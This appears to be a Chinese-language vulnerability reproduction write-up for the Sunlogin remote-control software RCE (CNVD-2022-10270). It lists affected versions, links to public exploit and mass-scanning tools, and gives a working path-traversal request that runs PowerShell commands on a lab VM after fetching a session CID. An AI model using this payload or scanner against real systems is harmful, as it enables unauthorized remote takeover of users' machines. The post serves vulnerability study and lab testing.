0x00-引言
本文內容及使用工具僅限學習交流,用戶濫用造成的一切后果均與作者無關,作者不承擔任何直接責任, 后果均由用戶本人負責,使用者請務必遵守當地法律法規。
復現的速度趕不上大佬出腳本的速度,牛掰
0x01-漏洞描述
上海貝銳信息科技股份有限公司的向日葵遠控軟件存在遠程代碼執行漏洞(CNVD-2022-10270/CNVD-2022-03672),影響Windows系統使用的個人版和簡約版,攻擊者可利用該漏洞獲取服務器控制權。
影響版本:
向日葵個人版 for Windows <= 11.0.0.33
向日葵簡約版 <= V1.0.1.43315(2021.12)
0x02-漏洞復現
工具下載(含有漏洞版本的向日葵):
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
工具命令:
-h 指定目標
-t 選擇掃描或者命令執行 默認scan
-p 設置掃描端口范圍 默認4w到65535
-c 需要執行的命令
01-工具復現
打開向日葵(我的裝在虛擬機里面)
使用工具掃描-掃描時間長
命令執行
02-手動復現
nmap探測或者其他工具探測
瀏覽器訪問ip+端口號+cgi-bin/rpc?action=verify-haras
(獲取session值CID)一個一個端口嘗試
拿到CID-添加payload和cookie-發送
http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
03-批量檢測工具
建議使用kali跑腳本,因為腳本要使用nmap
工具下載:
https://github.com/mrknow001/Sunlogin-rce